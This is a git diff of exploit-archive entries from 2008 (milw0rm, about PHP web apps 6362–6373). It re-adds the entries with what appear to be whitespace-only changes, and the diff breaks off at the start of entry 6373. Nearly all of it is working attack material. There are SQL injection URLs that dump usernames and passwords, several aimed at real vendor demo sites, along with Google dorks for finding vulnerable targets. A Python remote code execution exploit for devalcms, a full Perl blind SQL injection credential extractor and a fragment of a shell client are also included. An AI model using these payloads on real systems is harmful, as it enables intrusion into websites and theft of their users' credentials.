-|___________________________________________________|
-
-Exploit: 
-
-
-
-
-www.[target].com/Script/listtest.php?r=-20+union+select+1,concat_ws(0x3a,user(),version(),database())--
-
-
-
-
-
-
-L!VE DEMO:
-
-
-http://www.ezonescripts.com/productdemos/LivingLocal/listtest.php?r=-20+union+select+1,concat_ws(0x3a,user(),version(),database())--
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
-|
-| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
-|  
-|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
-|______________________________________________________________________
- 
-
-                       Im IRAQi
-
-# milw0rm.com [2008-09-03]
+|___________________________________________________|
+|
+|  Living Local (listtest.php r) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.Hussin-X.CoM  |  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://www.ezonescripts.com/scripts/sls/livinglocal.php
+|
+|___________________________________________________|
+
+Exploit: 
+
+
+
+
+www.[target].com/Script/listtest.php?r=-20+union+select+1,concat_ws(0x3a,user(),version(),database())--
+
+
+
+
+
+
+L!VE DEMO:
+
+
+http://www.ezonescripts.com/productdemos/LivingLocal/listtest.php?r=-20+union+select+1,concat_ws(0x3a,user(),version(),database())--
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
+|  
+|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
+|______________________________________________________________________
+ 
+
+                       Im IRAQi
+
+# milw0rm.com [2008-09-03]
diff --git a/platforms/php/webapps/6362.txt b/platforms/php/webapps/6362.txt
index db582bda4..d4252a9d6 100755
--- a/platforms/php/webapps/6362.txt
+++ b/platforms/php/webapps/6362.txt
@@ -1,67 +1,67 @@
-|___________________________________________________|
-|
-| ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home : WwW.Hussin-X.CoM  |  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script :http://discountedscripts.com/product_info.php?products_id=65
-|
-| DorK   : inurl:index.php?menu=adorder
-|___________________________________________________|
-
-Exploit: 
-________
-
-
-
-www.[target].com/Script/index.php?menu=adorder&adid=-3+union+select+null,null,concat_ws(0x3a,username,password),null+From+users--
-
-
-
-
-
-
-L!VE DEMO:
-_________
-
-
-http://www.discountedscripts.com/demos/acg-ptp/index.php?menu=adorder&adid=-3+union+select+null,null,concat_ws(0x3a,username,password),null+From+users--
-
-
-____________
-
-Admin Login :
-
-www.[target].com/Script/admin/
-
-____________
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
-|
-| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
-|  
-|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
-|______________________________________________________________________
-
-
-
-
-                             Im IRAQi
-
-# milw0rm.com [2008-09-04]
+|___________________________________________________|
+|
+| ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home : WwW.Hussin-X.CoM  |  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script :http://discountedscripts.com/product_info.php?products_id=65
+|
+| DorK   : inurl:index.php?menu=adorder
+|___________________________________________________|
+
+Exploit: 
+________
+
+
+
+www.[target].com/Script/index.php?menu=adorder&adid=-3+union+select+null,null,concat_ws(0x3a,username,password),null+From+users--
+
+
+
+
+
+
+L!VE DEMO:
+_________
+
+
+http://www.discountedscripts.com/demos/acg-ptp/index.php?menu=adorder&adid=-3+union+select+null,null,concat_ws(0x3a,username,password),null+From+users--
+
+
+____________
+
+Admin Login :
+
+www.[target].com/Script/admin/
+
+____________
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
+|  
+|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
+|______________________________________________________________________
+
+
+
+
+                             Im IRAQi
+
+# milw0rm.com [2008-09-04]
diff --git a/platforms/php/webapps/6363.txt b/platforms/php/webapps/6363.txt
index 6266b5f21..1b1fce109 100755
--- a/platforms/php/webapps/6363.txt
+++ b/platforms/php/webapps/6363.txt
@@ -1,24 +1,24 @@
-By Cr@zy_King a.k.a t4cs1zkr4L
-
-
-Qwicsite Pro (SQL/XSS) Multiple Vulnerabilities
-
-
-http://localhost/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a,password)+from+accounts/*
-
-
-
-
-
-::Username::pass
-
-
-
-http://localhost/?pageid=
-
-
-
-www.biyosecurity.com - www.heykirmedya.net [Yakinda Online]
-
-# milw0rm.com [2008-09-04]
+By Cr@zy_King a.k.a t4cs1zkr4L
+
+
+Qwicsite Pro (SQL/XSS) Multiple Vulnerabilities
+
+
+http://localhost/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a,password)+from+accounts/*
+
+
+
+
+
+::Username::pass
+
+
+
+http://localhost/?pageid=
+
+
+
+www.biyosecurity.com - www.heykirmedya.net [Yakinda Online]
+
+# milw0rm.com [2008-09-04]
diff --git a/platforms/php/webapps/6364.txt b/platforms/php/webapps/6364.txt
index 980e1ef22..ef9b982f7 100755
--- a/platforms/php/webapps/6364.txt
+++ b/platforms/php/webapps/6364.txt
@@ -1,77 +1,77 @@
-|___________________________________________________|
-|
-|ACG-ScriptShop (cid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script :http://discountedscripts.com/product_info.php?products_id=67
-|
-| DorK : inurl:index.php?menu=showcat
-|___________________________________________________|
-
-Exploit: 
-________
-
-www.[target].com/Script/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+coders--
-
-
-
-
-Exploit: 2
-________
-
-www.[target].com/Script/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+resellers--
-
-
-
-
-Exploit: 3
-________
-
-www.[target].com/Script/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,upass),3+from+users--
-
-
-
-
-L!VE DEMO:
-_________
-
-
-http://www.discountedscripts.com/demos/acgshop/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+coders--
-
-
-http://www.discountedscripts.com/demos/acgshop/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+resellers--
-
-
-
-http://www.creative66.com/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,upass),3+from+users--
-
-____________
-
-Admin Login :
-
-www.[target].com/Script/admin
-
-____________
-____________________________( Greetz )____________________________
-|
-| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
-|  
-| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n
-|_________________________________________________________________
-
-
-                       Im IRAQi
-
-# milw0rm.com [2008-09-04]
+|___________________________________________________|
+|
+|ACG-ScriptShop (cid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script :http://discountedscripts.com/product_info.php?products_id=67
+|
+| DorK : inurl:index.php?menu=showcat
+|___________________________________________________|
+
+Exploit: 
+________
+
+www.[target].com/Script/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+coders--
+
+
+
+
+Exploit: 2
+________
+
+www.[target].com/Script/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+resellers--
+
+
+
+
+Exploit: 3
+________
+
+www.[target].com/Script/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,upass),3+from+users--
+
+
+
+
+L!VE DEMO:
+_________
+
+
+http://www.discountedscripts.com/demos/acgshop/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+coders--
+
+
+http://www.discountedscripts.com/demos/acgshop/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,password),3+from+resellers--
+
+
+
+http://www.creative66.com/index.php?menu=showcat&cid=-2+union+select+1,concat_ws(0x3a,username,upass),3+from+users--
+
+____________
+
+Admin Login :
+
+www.[target].com/Script/admin
+
+____________
+____________________________( Greetz )____________________________
+|
+| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
+|  
+| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n
+|_________________________________________________________________
+
+
+                       Im IRAQi
+
+# milw0rm.com [2008-09-04]
diff --git a/platforms/php/webapps/6368.php b/platforms/php/webapps/6368.php
index 300060454..614763f2e 100755
--- a/platforms/php/webapps/6368.php
+++ b/platforms/php/webapps/6368.php
@@ -1,69 +1,69 @@
- \nEx: awtotalhack.php host.tld on\n");}
-array_shift($argv);
-$host = $argv[0];
-$magic = $argv[1];
-
-# Start the interactive shell
-while(1){
-  fwrite(STDOUT, "[shell:~ # ");
-  if ($magic == "on") {
-    $c = str_split(trim(fgets(STDIN)));
-    if (implode($c) == "exit") {die();};
-    for($i=0;$i
-
-# milw0rm.com [2008-09-05]
+ \nEx: awtotalhack.php host.tld on\n");}
+array_shift($argv);
+$host = $argv[0];
+$magic = $argv[1];
+
+# Start the interactive shell
+while(1){
+  fwrite(STDOUT, "[shell:~ # ");
+  if ($magic == "on") {
+    $c = str_split(trim(fgets(STDIN)));
+    if (implode($c) == "exit") {die();};
+    for($i=0;$i
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6369.py b/platforms/php/webapps/6369.py
index f033add31..717b94b6e 100755
--- a/platforms/php/webapps/6369.py
+++ b/platforms/php/webapps/6369.py
@@ -1,65 +1,65 @@
-#!/usr/bin/python
-#####################################################################################
-####           devalcms v1.4a Remote Code Execution Exploit / Xss                ####
-#####################################################################################
-#                                                                                   #
-#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
-#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
-#Our Site : Http://IRCRASH.COM                                                      #
-#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
-#####################################################################################
-#                                                                                   #
-#Download : http://www.sourceforge.net/projects/devalcms                            #
-#                                                                                   #
-#DORK : "powered by devalcms v1.4.a"                                                #
-#                                                                                   #
-#####################################################################################
-#                                      [Xss]                                        #
-#                                                                                   #
-#http://Site/[path]/index.php?currentpath=             #
-#                                                                                   #
-#####################################################################################
-#                                                                                   #
-#                           [Remote Code Execution]                                 #
-#                                                                                   #
-#Use this exploit for remote code execution valun .                                 #
-#                                                                                   #
-#####################################################################################
-#                           Site : Http://IRCRASH.COM                               #
-###################################### TNX GOD ######################################
-import sys,socket
-argv=sys.argv
-data=''
-query='/modules/tool/hitcounter.php?gv_folder_data=./url2header.php%00'
-if len(argv) < 3 :
-    print '[*]Devalcms v1.4.a Remote code execut exploit'
-    print '[*]Dork : powered by devalcms v1.4.a'
-    print '[*]Powered by : R3d.W0rm'
-    print '[*]Our Site : http://ircrash.com'
-    print '[*]Usage : ' + argv[0] + ' site /path'
-    exit()
-if 'http://' in argv[1] :
-    target=argv[1].replace('http://','')
-else :
-    target=argv[1]
-if '/' in argv[2] :
-    path=argv[2]
-else :
-    path='/' + argv[2]
-print '[*]Devalcms v1.4.a Remote code execut exploit'
-print '[*]Powered by : R3d.W0rm'
-print '[*]Our Site : http://ircrash.com'
-sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-sock.connect((target,80))
-sock.send("GET " + path + query + " HTTP/1.1\n")
-sock.send("Host: " + target + "\n")
-sock.send("Referer: " + data + "\n\n\n")
-recv=sock.recv(2048)
-if 'HTTP/1.1 200 OK' in recv :
-    print '[+]Code injected .'
-    print '[+]Code inject in http://: ' + target + path + '/modules/tool/url2header.php'
-else :
-    print '[-]Can not inject code.'
-exit()
-
-# milw0rm.com [2008-09-05]
+#!/usr/bin/python
+#####################################################################################
+####           devalcms v1.4a Remote Code Execution Exploit / Xss                ####
+#####################################################################################
+#                                                                                   #
+#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
+#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
+#Our Site : Http://IRCRASH.COM                                                      #
+#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
+#####################################################################################
+#                                                                                   #
+#Download : http://www.sourceforge.net/projects/devalcms                            #
+#                                                                                   #
+#DORK : "powered by devalcms v1.4.a"                                                #
+#                                                                                   #
+#####################################################################################
+#                                      [Xss]                                        #
+#                                                                                   #
+#http://Site/[path]/index.php?currentpath=             #
+#                                                                                   #
+#####################################################################################
+#                                                                                   #
+#                           [Remote Code Execution]                                 #
+#                                                                                   #
+#Use this exploit for remote code execution valun .                                 #
+#                                                                                   #
+#####################################################################################
+#                           Site : Http://IRCRASH.COM                               #
+###################################### TNX GOD ######################################
+import sys,socket
+argv=sys.argv
+data=''
+query='/modules/tool/hitcounter.php?gv_folder_data=./url2header.php%00'
+if len(argv) < 3 :
+    print '[*]Devalcms v1.4.a Remote code execut exploit'
+    print '[*]Dork : powered by devalcms v1.4.a'
+    print '[*]Powered by : R3d.W0rm'
+    print '[*]Our Site : http://ircrash.com'
+    print '[*]Usage : ' + argv[0] + ' site /path'
+    exit()
+if 'http://' in argv[1] :
+    target=argv[1].replace('http://','')
+else :
+    target=argv[1]
+if '/' in argv[2] :
+    path=argv[2]
+else :
+    path='/' + argv[2]
+print '[*]Devalcms v1.4.a Remote code execut exploit'
+print '[*]Powered by : R3d.W0rm'
+print '[*]Our Site : http://ircrash.com'
+sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((target,80))
+sock.send("GET " + path + query + " HTTP/1.1\n")
+sock.send("Host: " + target + "\n")
+sock.send("Referer: " + data + "\n\n\n")
+recv=sock.recv(2048)
+if 'HTTP/1.1 200 OK' in recv :
+    print '[+]Code injected .'
+    print '[+]Code inject in http://: ' + target + path + '/modules/tool/url2header.php'
+else :
+    print '[-]Can not inject code.'
+exit()
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6370.pl b/platforms/php/webapps/6370.pl
index 5a722097f..8f0ada540 100755
--- a/platforms/php/webapps/6370.pl
+++ b/platforms/php/webapps/6370.pl
@@ -1,212 +1,212 @@
-#!/usr/bin/perl -W
- 
-# webCMS Portal Edition (index.php id) Blind SQL Injection Exploit
-# url: webcms.es
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-
-# team: Spanish Hackers Team - [SHT]
-#
-# h4x0rz:/home/joss/Desktop# perl o.pl -u "http://www.jubicam.org/index.php?menu=documentos&id=69" -p Concurso
-# [i] Getting default: -T 30
-# [i] Getting default: -l 200
-# [i] Getting default: -t 15
-# 12 123 {
-# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 12.
-# [i] USER / PASSWORD:
-# root / a314
-#
-# This was written for educational purpose. Use it at your own risk.
-
-# Author will be not responsible for any damage.
-
-# special thanks: ka0x! http://milw0rm.com/papers/197
-
-my $MAX_FIELD_LENGTH = 200 ;
-my $EXIT_IF_NO_CHAR = 1 ;
-my $DEFAULT_THREADS = 15 ;
-my $DEFAULT_THREADS_TIMEOUT = 30 ;
-my @ascii = ( 32 .. 123 ) ;
-my $DEFAULT_THREADS_TIME = 1 ;
-
- 
-use LWP::UserAgent ;
- 
-sub _HELP_AND_EXIT
-{
-    die "
- 
-  ./$0 -u  -p 
- 
- Options:
-  -u                   Ex: http://localhost/index.php?menu=documentos&id=69
-  -p               HTML pattern.
- 
- Other:
-  -t    <#>                 Threads, default '$DEFAULT_THREADS'.
-  -l    <#>                 Maximum table name length '$MAX_FIELD_LENGTH'.
-  -T    <#>                 Timeout.
-  -h                        Help (also with --help).
- 
-  Example:
- 
-  ./$0 -u \"http://localhost/index.php?menu=documentos&id=69\" -p Concurso
- 
-" ;
-}
- 
- 
-    my ($p, $w) = ({ @ARGV }, { }) ;
- 
-    map {
-        &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ;
-    } keys %$p ;
- 
-    map {
-        die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ;
-    } qw/-u -p/ ;
- 
-    $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ;
-    $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ;
-    $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ;
- 
-    map {
-        warn "[i] Getting default: $_ $w->{ $_ }\n" ;
-    } sort keys %$w ;
- 
-    ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ;
- 
- 
- 
- 
-sub _START_WORK
-{
-    my $p = shift ;
- 
-    my $position = 1 ;
- 
-    pipe(R, W) ;
-    pipe(Rs, Ws) ;
-    autoflush STDOUT 1 ;
- 
-    my $sql_message = '' ;
-    my $msg = '' ;
-    my @pid ;
- 
-    while( $position <= $p->{'-l'} )
-    {
-        my $cf ;
-        unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; }
-        push(@pid, $cf) ;
- 
-        my $count = 0 ;
-        my $can_exit ;
-        my $char_printed ;
- 
-        while()
-        {
-            chomp ;
-            push(@pid, (split(/:/))[1] ) if /^pid/ ;
- 
-            my ($res, $pos, $ascii) = ( split(/ /, $_) ) ;
-            $count++ if $pos == $position ;
- 
-            print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ;
- 
-            if( $res eq 'yes' and $pos == $position ){
-                    $char_printed = $can_exit = 1 ;
-                    print Ws "STOP $position\n" ;
-                    $sql_message .= chr( $ascii ) ;
-            }
- 
-            last if ( $can_exit or $count == @ascii );
-        }
- 
-        map { waitpid($_, 0) } @pid ;
- 
-        unless( $char_printed )
-        {
-            if( $EXIT_IF_NO_CHAR )
-            {
-                warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n"  ;
-                last ;
-            }
-        }
- 
-        $position++ ;
-    }
- 
-    print "[i] USER / PASSWORD:\n$sql_message\n" ;
- 
-}
- 
-sub _CHECKING
-{
-    my ($p, $position) = @_ ;
-    my $counter = 0 ;
-    my $stop_position ;
- 
-    foreach my $ascii ( @ascii )
-    {
-        $counter++ ;
- 
-        if( $counter % $p->{'-t'} == 0 )
-        {
-            my $stop_position ;
-            eval
-            {
-                $SIG{'ALRM'} = sub { die "non_stop\n" } ;
-                alarm $DEFAULT_THREADS_TIME ;
-                my $line =  ;
-                $stop_position = (split( / /, $line))[1] ;
-                alarm 0 ;
-            } ;
- 
-            if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; }
-        }
- 
-        unless(my $pid = fork )
-        {
-            print Ws "pid:$pid\n" or die ;
- 
- 
-            my $url = $p->{'-u'} .
-                ' AND ascii(substring((SELECT CONCAT(login,0x202f20,password) FROM usuarios LIMIT 0,1),' . $position . ',1))='. $ascii ;
- 
-            my $ua = LWP::UserAgent->new ;
-            $ua->timeout( $p->{'-T'} ) ;
- 
-            my $content ;
-            while( 1 )
-            {
-                last if $content = $ua->get( $url )->content ;
-            }
- 
-            ( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ;
- 
-            exit( 0 ) ;
-        }
- 
-    }
-}
- 
- 
- 
-sub _IS_VULN
-{
-    my $p = shift ;
- 
-    my $ua = LWP::UserAgent->new ;
-    $ua->timeout( $p->{'-T'} ) ;
- 
-    my ( $one, $two ) = (
-        $ua->get( $p->{'-u'}." AND 1=1")->content ,
-        $ua->get( $p->{'-u'}." AND 1=2")->content ,
-    ) ;
- 
-    return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ;
-}
-
-# milw0rm.com [2008-09-05]
+#!/usr/bin/perl -W
+ 
+# webCMS Portal Edition (index.php id) Blind SQL Injection Exploit
+# url: webcms.es
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+
+# team: Spanish Hackers Team - [SHT]
+#
+# h4x0rz:/home/joss/Desktop# perl o.pl -u "http://www.jubicam.org/index.php?menu=documentos&id=69" -p Concurso
+# [i] Getting default: -T 30
+# [i] Getting default: -l 200
+# [i] Getting default: -t 15
+# 12 123 {
+# [!] $EXIT_IF_NO_CHAR : I can't find a valid character, position 12.
+# [i] USER / PASSWORD:
+# root / a314
+#
+# This was written for educational purpose. Use it at your own risk.
+
+# Author will be not responsible for any damage.
+
+# special thanks: ka0x! http://milw0rm.com/papers/197
+
+my $MAX_FIELD_LENGTH = 200 ;
+my $EXIT_IF_NO_CHAR = 1 ;
+my $DEFAULT_THREADS = 15 ;
+my $DEFAULT_THREADS_TIMEOUT = 30 ;
+my @ascii = ( 32 .. 123 ) ;
+my $DEFAULT_THREADS_TIME = 1 ;
+
+ 
+use LWP::UserAgent ;
+ 
+sub _HELP_AND_EXIT
+{
+    die "
+ 
+  ./$0 -u  -p 
+ 
+ Options:
+  -u                   Ex: http://localhost/index.php?menu=documentos&id=69
+  -p               HTML pattern.
+ 
+ Other:
+  -t    <#>                 Threads, default '$DEFAULT_THREADS'.
+  -l    <#>                 Maximum table name length '$MAX_FIELD_LENGTH'.
+  -T    <#>                 Timeout.
+  -h                        Help (also with --help).
+ 
+  Example:
+ 
+  ./$0 -u \"http://localhost/index.php?menu=documentos&id=69\" -p Concurso
+ 
+" ;
+}
+ 
+ 
+    my ($p, $w) = ({ @ARGV }, { }) ;
+ 
+    map {
+        &_HELP_AND_EXIT if $_ eq '--help' or $_ eq '-h' ;
+    } keys %$p ;
+ 
+    map {
+        die "[!] Require: $_\n[!] Help: ./$0 --help\n" unless $p->{ $_ } ;
+    } qw/-u -p/ ;
+ 
+    $p->{'-t'} = ( $p->{'-t'} and $p->{'-t'} =~ /^\d+$/ ) ? $p->{'-t'} : ( $w->{'-t'} = $DEFAULT_THREADS ) ;
+    $p->{'-l'} = ( $p->{'-l'} and $p->{'-l'} =~ /^\d+$/ ) ? $p->{'-l'} : ( $w->{'-l'} = $MAX_FIELD_LENGTH ) ;
+    $p->{'-T'} = ( $p->{'-T'} and $p->{'-T'} =~ /^\d+$/ ) ? $p->{'-T'} : ( $w->{'-T'} = $DEFAULT_THREADS_TIMEOUT ) ;
+ 
+    map {
+        warn "[i] Getting default: $_ $w->{ $_ }\n" ;
+    } sort keys %$w ;
+ 
+    ( &_IS_VULN( $p ) ) ? &_START_WORK( $p ) : die "[i] Bad pattern ? Isn't vulnerable ?\n" ;
+ 
+ 
+ 
+ 
+sub _START_WORK
+{
+    my $p = shift ;
+ 
+    my $position = 1 ;
+ 
+    pipe(R, W) ;
+    pipe(Rs, Ws) ;
+    autoflush STDOUT 1 ;
+ 
+    my $sql_message = '' ;
+    my $msg = '' ;
+    my @pid ;
+ 
+    while( $position <= $p->{'-l'} )
+    {
+        my $cf ;
+        unless( $cf = fork ){ &_CHECKING( $p, $position ) ; exit(0) ; }
+        push(@pid, $cf) ;
+ 
+        my $count = 0 ;
+        my $can_exit ;
+        my $char_printed ;
+ 
+        while()
+        {
+            chomp ;
+            push(@pid, (split(/:/))[1] ) if /^pid/ ;
+ 
+            my ($res, $pos, $ascii) = ( split(/ /, $_) ) ;
+            $count++ if $pos == $position ;
+ 
+            print "\b" x length($msg), ($msg = "$position $ascii " . chr($ascii) ) ;
+ 
+            if( $res eq 'yes' and $pos == $position ){
+                    $char_printed = $can_exit = 1 ;
+                    print Ws "STOP $position\n" ;
+                    $sql_message .= chr( $ascii ) ;
+            }
+ 
+            last if ( $can_exit or $count == @ascii );
+        }
+ 
+        map { waitpid($_, 0) } @pid ;
+ 
+        unless( $char_printed )
+        {
+            if( $EXIT_IF_NO_CHAR )
+            {
+                warn "\n[!] \$EXIT_IF_NO_CHAR : I can't find a valid character, position $position.\n"  ;
+                last ;
+            }
+        }
+ 
+        $position++ ;
+    }
+ 
+    print "[i] USER / PASSWORD:\n$sql_message\n" ;
+ 
+}
+ 
+sub _CHECKING
+{
+    my ($p, $position) = @_ ;
+    my $counter = 0 ;
+    my $stop_position ;
+ 
+    foreach my $ascii ( @ascii )
+    {
+        $counter++ ;
+ 
+        if( $counter % $p->{'-t'} == 0 )
+        {
+            my $stop_position ;
+            eval
+            {
+                $SIG{'ALRM'} = sub { die "non_stop\n" } ;
+                alarm $DEFAULT_THREADS_TIME ;
+                my $line =  ;
+                $stop_position = (split( / /, $line))[1] ;
+                alarm 0 ;
+            } ;
+ 
+            if( ($stop_position) and $stop_position == $position ){ print "\nnext position\n" ; exit(0) ; }
+        }
+ 
+        unless(my $pid = fork )
+        {
+            print Ws "pid:$pid\n" or die ;
+ 
+ 
+            my $url = $p->{'-u'} .
+                ' AND ascii(substring((SELECT CONCAT(login,0x202f20,password) FROM usuarios LIMIT 0,1),' . $position . ',1))='. $ascii ;
+ 
+            my $ua = LWP::UserAgent->new ;
+            $ua->timeout( $p->{'-T'} ) ;
+ 
+            my $content ;
+            while( 1 )
+            {
+                last if $content = $ua->get( $url )->content ;
+            }
+ 
+            ( $content =~ /$p->{'-p'}/ ) ? print W "yes $position $ascii\n" : print W "no $position $ascii\n" ;
+ 
+            exit( 0 ) ;
+        }
+ 
+    }
+}
+ 
+ 
+ 
+sub _IS_VULN
+{
+    my $p = shift ;
+ 
+    my $ua = LWP::UserAgent->new ;
+    $ua->timeout( $p->{'-T'} ) ;
+ 
+    my ( $one, $two ) = (
+        $ua->get( $p->{'-u'}." AND 1=1")->content ,
+        $ua->get( $p->{'-u'}." AND 1=2")->content ,
+    ) ;
+ 
+    return ($one =~ /$p->{'-p'}/ and $two !~ /$p->{'-p'}/) ? 1 : undef ;
+}
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6371.txt b/platforms/php/webapps/6371.txt
index ef45a4912..2dfb1f146 100755
--- a/platforms/php/webapps/6371.txt
+++ b/platforms/php/webapps/6371.txt
@@ -1,30 +1,30 @@
-#######################################################
-# The Real Estate Script ( view_ann.php ) SQL Injection Vulnerability
-#
-# Author   : DeViL iRaQ
-#
-# Email     : guitar_lover46[at]yahoo[dot]com
-#
-# Price     : $399.99 (:
-#
-# Script Home Page : http://www.vastal.com/agent-zone-real-estate-script.html
-#
-# Demo      : http://www.vastal.com/real/
-#
-# Dork      : N/A
-########################################################
-# Exploit :
-# www.[sitename].com/view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
-#
-# Live Demo:
-# http://www.vastal.com/real/view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
-#
-# Admin login :
-# http://www.[sitename].com/admin/
-#########################################################
-# Greetz :
-#                      All members of the Forum  WwW.Hussin-X.CoM
-#  Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
-#########################################################
-
-# milw0rm.com [2008-09-05]
+#######################################################
+# The Real Estate Script ( view_ann.php ) SQL Injection Vulnerability
+#
+# Author   : DeViL iRaQ
+#
+# Email     : guitar_lover46[at]yahoo[dot]com
+#
+# Price     : $399.99 (:
+#
+# Script Home Page : http://www.vastal.com/agent-zone-real-estate-script.html
+#
+# Demo      : http://www.vastal.com/real/
+#
+# Dork      : N/A
+########################################################
+# Exploit :
+# www.[sitename].com/view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
+#
+# Live Demo:
+# http://www.vastal.com/real/view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
+#
+# Admin login :
+# http://www.[sitename].com/admin/
+#########################################################
+# Greetz :
+#                      All members of the Forum  WwW.Hussin-X.CoM
+#  Hussin X , JeFaRa , GenX ThE Hacker Iraqi , Iraqi Diver , Ameer Elshouq , IRAQ_JaGUaR
+#########################################################
+
+# milw0rm.com [2008-09-05]
diff --git a/platforms/php/webapps/6373.txt b/platforms/php/webapps/6373.txt
index 3ed3cae49..09a919afb 100755
--- a/platforms/php/webapps/6373.txt
